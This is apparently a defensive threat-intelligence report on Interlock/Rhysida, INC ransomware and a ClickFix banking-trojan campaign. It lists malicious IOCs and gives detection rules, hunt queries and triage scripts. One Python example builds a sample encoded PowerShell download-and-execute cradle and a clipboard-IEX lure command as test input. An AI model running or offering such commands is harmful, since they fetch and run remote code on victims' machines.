Recent OTX pulses highlight a surge in high-fidelity ransomware and banking trojan activity. The Interlock (Hive0163) and Rhysida threat groups are aggressively leveraging a complex ecosystem of custom malware (NodeSnake, InterlockRAT) and commodity loaders (MintLoader, SocGholish) to facilitate ransomware deployment across critical infrastructure sectors. Simultaneously, INC Ransomware has cemented its status as a top-tier threat following the disruption of LockBit and BlackCat, utilizing rewritten Rust-based encryptors for cross-platform impact. Separately, a sophisticated AI-generated ClickFix campaign is targeting the Brazilian financial sector, utilizing fake CAPTCHAs and typosquatting to deliver SmartRAT, a stealthy PowerShell-based banking trojan.
Collectively, these pulses indicate a trend toward ecosystem-dependent ransomware operations (RaaS) and the low-barrier abuse of AI tools for social engineering. The primary objectives are financial extortion via double-extortion tactics (INC, Rhysida) and credential harvesting for banking fraud (SmartRAT).
Threat Actor / Malware Profile
Interlock & Rhysida (Hive0163 / Vanilla Tempest)
- Distribution: Initial access is achieved via trojanized installers (CVE-2023-36036 exploitation) and SEO-poisoned sites delivering SocGholish (fake browser update lures) and Gootloader.
- Payload Behavior: The attack chain deploys MintLoader and ModeloRAT before moving to the custom InterlockRAT and NodeSnake. Rhysida affiliates utilize the Endico downloader and Broomstick loader.
- C2 Communication: Malware establishes C2 via HTTP/HTTPS to hardcoded domains (e.g., leadslaw.com), utilizing custom encoding and often leveraging SystemBC for proxying traffic.
- Persistence: Persistence is achieved through Scheduled Tasks and Registry Run keys, often masked by the Tomb crypter to evade static analysis.
- Anti-Analysis: Heavy use of the Supper downloader and Tomb crypter to obfuscate payloads. NodeSnake employs rootkit capabilities for stealth.
INC Ransomware (RaaS)
- Distribution: Affiliates leverage exploits for recent vulnerabilities (e.g., CVE-2025-5777, CVE-2024-57727) and valid credentials obtained via initial access brokers.
- Payload Behavior: The malware uses Rust-based encryptors for both Windows and Linux/ESXi environments, causing wide-scale disruption. It employs double-extortion, exfiltrating data via tools like Cobalt Strike and Sinobi before encryption.
- C2 Communication: Negotiation and data leak sites are hosted on Tor Onion services (incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid.onion).
- Persistence: Lateral movement tools like Cobalt Strike BEACON and Brave Prince are used to maintain access within the victim's environment.
- Anti-Analysis: The choice of Rust increases the complexity of both static analysis of the encryptor and memory forensics.
ClickFix / SmartRAT Campaign
- Distribution: AI-generated website builders create typosquatting domains (e.g., crefisa.online) mimicking Brazilian banks. Users are served fake CAPTCHA/BSOD screens.
- Payload Behavior: Users are tricked into running a PowerShell command that downloads GhostLoader, which then injects SmartRAT or Banana RAT into memory.
- C2 Communication: C2 communications are encrypted and designed to blend in with legitimate banking traffic.
- Persistence: Fileless execution techniques and PowerShell profiles are used to maintain persistence without dropping significant artifacts to disk.
- Anti-Analysis: The use of AI-generated content makes static detection of phishing sites difficult. Fileless execution hinders disk-based forensics.
IOC Analysis
The provided IOCs include a mix of network and file-based indicators crucial for detection:
- Domains & URLs: Include typosquatted domains (crefisa.online, incblog.su), C2 domains (leadslaw.com), and Tor Onion services for ransomware negotiations. SOC teams should block these at the DNS layer and hunt for HTTP requests to these domains in proxy logs.
- File Hashes: A variety of MD5, SHA1, and SHA256 hashes are provided for loaders (MintLoader), RATs (SmartRAT), and ransomware payloads. EDR solutions should be configured to alert on execution of these hashes. Tools like VirusTotal can be used for triage.
- CVEs: Indicators reference specific vulnerabilities (CVE-2023-36036, CVE-2025-5777). Vulnerability scanners must be updated to detect exploitation attempts against these CVEs.
- IP Addresses: C2 infrastructure IPs like 162.141.111.227 and 185.196.9.234 should be blocked on perimeter firewalls.
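To make the blocking and hunting guidance above concrete, here is an added Python example (it is not part of the OTX pulses or of this report) that matches the listed domains, IPs and hashes against log lines. Everything besides the indicators themselves is constructed for the example: the proxy log and EDR hash export formats, the device names, the benign destinations (RFC 5737 addresses and example.com) and the look-alike domain notleadslaw.com, which is there to show that matching must be on the exact domain or a subdomain, not on a substring. The host-extraction regex follows the same idea as the extract() call in the Sentinel hunt query in the Detection Engineering section.

```python
import re

# Indicators as listed in the IOC Analysis above (domains, IPs, hashes).
IOC_DOMAINS = {
    "leadslaw.com",
    "crefisa.online",
    "incblog.su",
    "incpaykabjqc2mtdxq6c23nqh4x6m5dkps5fr6vgdkgzp5njssx6qkid.onion",
}
IOC_IPS = {"162.141.111.227", "185.196.9.234"}
IOC_HASHES = {
    "f0b3e112ce4807a28e2b5d66a840ed7f",
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c",
    "297eb45f028d44d750297d2f932b9c91",
}

# Host extraction: drop the scheme, an optional user@ part and a leading "www.",
# then stop at a port, path, query or whitespace.
URL_HOST_RE = re.compile(r"^(?:https?://)?(?:[^@/\s]+@)?(?:www\.)?([^:/\s?]+)")
HEX_HASH_RE = re.compile(r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}")  # MD5 / SHA1 / SHA256


def host_from_url(url):
    """Return the lower-cased host part of a URL, or '' if none is found."""
    m = URL_HOST_RE.match(url.strip())
    return m.group(1).lower().rstrip(".") if m else ""


def domain_hit(host):
    """Return the IOC domain that `host` equals or is a subdomain of, else None.
    The leading dot keeps 'notleadslaw.com' from matching 'leadslaw.com'."""
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def scan_proxy_log(lines):
    """Constructed proxy log format: '<ts> <client_ip> <dst_ip> <method> <url> <status>'."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6:
            continue  # malformed line, skip it
        ts, client, dst, _method, url, _status = parts[:6]
        ioc = domain_hit(host_from_url(url))
        if ioc:
            hits.append({"ts": ts, "client": client, "type": "domain", "indicator": ioc})
        elif dst in IOC_IPS:
            hits.append({"ts": ts, "client": client, "type": "ip", "indicator": dst})
    return hits


def scan_hash_report(lines):
    """Constructed EDR export format: '<device> <path> <hash>'. The path may contain
    spaces, and the hash may be MD5, SHA1 or SHA256 in either letter case."""
    hits = []
    for line in lines:
        try:
            device, rest = line.split(maxsplit=1)
            path, digest = rest.rsplit(maxsplit=1)
        except ValueError:
            continue  # fewer than three fields
        digest = digest.lower()
        if HEX_HASH_RE.fullmatch(digest) and digest in IOC_HASHES:
            hits.append({"device": device, "path": path, "indicator": digest})
    return hits


# Constructed sample input.
PROXY_LOG = [
    "2026-06-17T10:01:02Z 10.0.0.5 203.0.113.10 GET https://www.leadslaw.com/update/check 200",
    "2026-06-17T10:01:09Z 10.0.0.7 203.0.113.20 GET https://cdn.example.com/lib.js 200",
    "2026-06-17T10:02:15Z 10.0.0.9 185.196.9.234 POST http://185.196.9.234/gate.php 200",
    "2026-06-17T10:03:40Z 10.0.0.5 203.0.113.30 GET https://login.crefisa.online/ 200",
    "2026-06-17T10:04:01Z 10.0.0.8 203.0.113.40 GET https://notleadslaw.com/ 200",
]
HASH_REPORT = [
    r"WS-014 C:\Users\a\AppData\Local\Temp\smart.exe f0b3e112ce4807a28e2b5d66a840ed7f",
    r"WS-014 C:\Windows\System32\notepad.exe 0000000000000000000000000000000000000000000000000000000000000000",
    r"WS-021 C:\Users\b\Downloads\setup.exe 333903C7D22A27098E45FC64B77A264AA220605CFBD3E329C200D7E4B42C881C",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_LOG) + scan_hash_report(HASH_REPORT):
        print(hit)
```

Run against the constructed input, the proxy scan reports three hits (the leadslaw.com request, the direct connection to 185.196.9.234, and the crefisa.online subdomain) and ignores notleadslaw.com; the hash scan reports the two files whose digests appear in the pulse, regardless of the case the EDR exported them in.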
Detection Engineering
Sigma Rules
```yaml
---
title: Potential Interlock/Rhysida C2 Traffic
id: 67f8ba89-4c92-4c3d-b5e8-0123456789ab
description: Detects potential network connections to known Interlock/Rhysida infrastructure or suspicious domains associated with their campaign.
status: experimental
date: 2026/06/17
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6123456789abcdef0123456789abcdef
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: proxy
detection:
  selection:
    cs-host|contains:   # Sigma proxy taxonomy field for the requested host (c-hostname is not a defined field)
      - leadslaw.com
      - windowsupdate-cdn.com
  condition: selection
falsepositives:
  - Unknown
level: high
---
title: Suspicious PowerShell Execution - ClickFix Pattern
date: 2026/06/17
author: Security Arsenal
status: experimental
description: Detects PowerShell commands often used in ClickFix campaigns, specifically those mimicking copy-paste instructions or involving encoded commands common in fake CAPTCHA scams.
references:
  - https://otx.alienvault.com/pulse/6123456789abcdef0123456789abcdef
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_cli:
    CommandLine|contains|all:
      - 'powershell'
      - 'clipboard'
      - 'GetText'   # Common in ClickFix scripts
  selection_encoded:
    CommandLine|contains:
      - 'FromBase64String'
      - 'IEX'
  condition: 1 of selection_*
falsepositives:
  - Administrative scripts
level: medium
---
title: INC Ransomware File Encryption Pattern
date: 2026/06/17
author: Security Arsenal
status: experimental
description: Detects potential INC ransomware activity based on known file extension or encryption note patterns, or the presence of a Rust-based process performing bulk file modifications.
references:
  - https://otx.alienvault.com/pulse/6123456789abcdef0123456789abcdef
tags:
  - attack.impact
  - attack.t1486
logsource:
  category: file_change
  product: windows
detection:
  selection_extension:
    TargetFilename|endswith:
      - '.inc'
  selection_ransom_note:
    TargetFilename|contains:
      - 'README'
      - 'RECOVER'
    NewName|contains:
      - 'inc'
  selection_process:
    Image|endswith:
      - '.exe'
    Company: null   # field absent: version info is often stripped from Rust binaries ("contains ''" would match every event)
  condition: 1 of selection_*
falsepositives:
  - Rare
level: critical
```
KQL (Microsoft Sentinel)
```kql
// Hunt for connections to domains from the OTX Pulse
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("leadslaw.com", "windowsupdate-cdn.com", "crefisa.online", "incblog.su")
| extend Domain = extract(@"^(?:https?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n?]+)", 1, RemoteUrl)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, Domain
| summarize Count = count() by Domain, DeviceName, RemoteIP   // count() is lowercase; name the column so "order by Count" resolves
| order by Count desc
```

```kql
// Hunt for suspicious PowerShell execution patterns seen in ClickFix
DeviceProcessEvents
| where Timestamp > ago(3d)
| where FileName in~ ("powershell.exe", "pwsh.exe")   // the PowerShell process itself, not processes it spawned
| where ProcessCommandLine has_any ("clipboard", "IEX", "FromBase64String")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| take 100
```
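The Sigma and KQL rules above flag ClickFix-style PowerShell, but an analyst still has to decide whether each hit is a pasted lure or one of the administrative scripts listed as a false positive. The following added Python example (it is not from this report, the pulses, or any tool named in them) scores constructed process-creation events on the same traits the rules use, decodes any -EncodedCommand argument so the payload can be read before the verdict is made, and treats explorer.exe as parent as the sign of a command pasted into the Run dialog. The indicator weights, the verdict thresholds, the device names and the sample events are all assumptions of this example; example.invalid is a reserved name that never resolves.

```python
import base64
import binascii
import re

# Traits named by the Sigma/KQL rules above (clipboard read, encoded command,
# FromBase64String, IEX) plus two commonly paired with them (hidden window,
# download cradle). Weights are an assumption of this example.
INDICATORS = {
    "clipboard_read":    (re.compile(r"Get-Clipboard|Clipboard\]::GetText\(", re.I), 3),
    "encoded_command":   (re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|e)\s+[A-Za-z0-9+/=]{16,}", re.I), 2),
    "base64_decode":     (re.compile(r"FromBase64String", re.I), 2),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "hidden_window":     (re.compile(r"(?:^|\s)-(?:windowstyle|win|w)\s+hidden", re.I), 1),
    "download_cradle":   (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I), 2),
}
ENC_ARG_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|e)\s+([A-Za-z0-9+/=]+)", re.I)
# A PowerShell process whose parent is explorer.exe is what a command pasted into
# the Win+R Run dialog looks like; the extra weight it gets is an assumption.
USER_SHELLS = {"explorer.exe"}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand/-enc, or None if absent or malformed."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage(event):
    """Score one process-creation event {device, parent, cmdline}. The decoded payload
    is searched as well, so traits hidden behind -enc still count."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    matched = [name for name, (rx, _w) in INDICATORS.items() if rx.search(haystack)]
    score = sum(INDICATORS[name][1] for name in matched)
    if event.get("parent", "").lower() in USER_SHELLS:
        matched.append("spawned_from_explorer")
        score += 2
    if score >= 5:
        verdict = "suspicious"
    elif score >= 2:
        verdict = "review"   # e.g. FromBase64String alone: the "administrative scripts" tier
    else:
        verdict = "benign"
    return {"device": event.get("device"), "verdict": verdict, "score": score,
            "indicators": matched, "decoded": decoded}


def _encode_for_powershell(text):
    """Constructed helper: the form PowerShell expects for -EncodedCommand (base64 of UTF-16LE)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed events: two ClickFix-style launches, one scheduled backup, one admin one-liner.
SAMPLE_EVENTS = [
    {"device": "WS-014", "parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -enc " + _encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.txt')")},
    {"device": "WS-021", "parent": "explorer.exe",
     "cmdline": 'powershell -NoP -c "IEX ([Windows.Forms.Clipboard]::GetText())"'},
    {"device": "SRV-03", "parent": "svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"device": "WS-007", "parent": "cmd.exe",
     "cmdline": 'powershell.exe -c "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($env:CFG))"'},
]

if __name__ == "__main__":
    for result in map(triage, SAMPLE_EVENTS):
        print(result["device"], result["verdict"], result["score"], result["indicators"])
        if result["decoded"]:
            print("   decoded:", result["decoded"])
```

On the constructed events the two explorer.exe-spawned launches come out as suspicious (the first only because the -enc payload was decoded and found to contain IEX and a download cradle), the scheduled backup is benign, and the lone FromBase64String one-liner lands in the review tier, which is where the Sigma rule's "Administrative scripts" false positives belong.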
PowerShell Hunt Script
```powershell
# IOC Hunt Script: Checks for file hashes and suspicious paths associated with Interlock/Rhysida and ClickFix campaigns,
# then lists scheduled tasks that launch PowerShell or cmd (a common persistence mechanism).
# Requires administrative privileges.
$MaliciousHashes = @(
    "f0b3e112ce4807a28e2b5d66a840ed7f",                                  # MD5
    "333903c7d22a27098e45fc64b77a264aa220605cfbd3e329c200d7e4b42c881c",  # SHA256
    "297eb45f028d44d750297d2f932b9c91"                                   # MD5
)
$SuspiciousPaths = @(
    "$env:TEMP\smart.exe",
    "$env:APPDATA\Microsoft\Windows\Templates\ghostloader.vbs"
)
# User-writable locations these loaders are dropped into; hashing only the first 1000 entries of C:\ covers almost nothing.
$ScanRoots = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA, $env:ProgramData, $env:PUBLIC)

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan
foreach ($file in (Get-ChildItem -Path $ScanRoots -File -Recurse -ErrorAction SilentlyContinue)) {
    if ($file.Length -eq 0) { continue }
    # The indicator list mixes MD5 and SHA256, so both must be computed or the SHA256 entries can never match.
    foreach ($algo in @("MD5", "SHA256")) {
        $hash = (Get-FileHash -Path $file.FullName -Algorithm $algo -ErrorAction SilentlyContinue).Hash
        if ($hash -and ($MaliciousHashes -contains $hash)) {   # -contains compares case-insensitively
            Write-Host "[!] MALICIOUS FILE DETECTED ($algo): $($file.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for suspicious file paths..." -ForegroundColor Cyan
foreach ($path in $SuspiciousPaths) {
    if (Test-Path -LiteralPath $path) {
        Write-Host "[!] SUSPICIOUS PATH DETECTED: $path" -ForegroundColor Red
    }
}

Write-Host "[+] Checking for scheduled tasks (common for persistence)..." -ForegroundColor Cyan
Get-ScheduledTask |
    Where-Object { $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*" } |
    Select-Object TaskName, TaskPath, @{ Name = "Execute"; Expression = { $_.Actions.Execute -join "; " } } |
    Format-Table -AutoSize
```
Response Priorities
- Immediate:
  - Block all listed IOCs (IPs, Domains, Hashes) on perimeter firewalls, proxies, and EDR systems.
  - Initiate a hunt for the file hashes provided in the pulses across all endpoints using EDR historical searches.
  - Isolate any endpoints showing signs of ransomware encryption activity or communication with the listed C2 infrastructure.
- 24h:
  - Investigate systems identified in the hunt for signs of MintLoader, SystemBC, or SmartRAT execution.
  - Review logs for successful exploitation of CVE-2023-36036 or CVE-2025-5777.
  - If credential theft is suspected (SmartRAT), force a password reset for affected users and enable MFA enforcement.
- 1 Week:
  - Patch systems for the identified CVEs (CVE-2023-36036, CVE-2023-3519, CVE-2025-5777, CVE-2024-57727).
  - Conduct a review of remote access protocols (RDP, VPN) and implement stricter controls (MFA, geo-fencing) to prevent initial access.
  - Update security awareness training to include AI-powered social engineering and ClickFix techniques.
  - Implement application control to prevent execution of unauthorized software in directories like %TEMP% and %APPDATA%.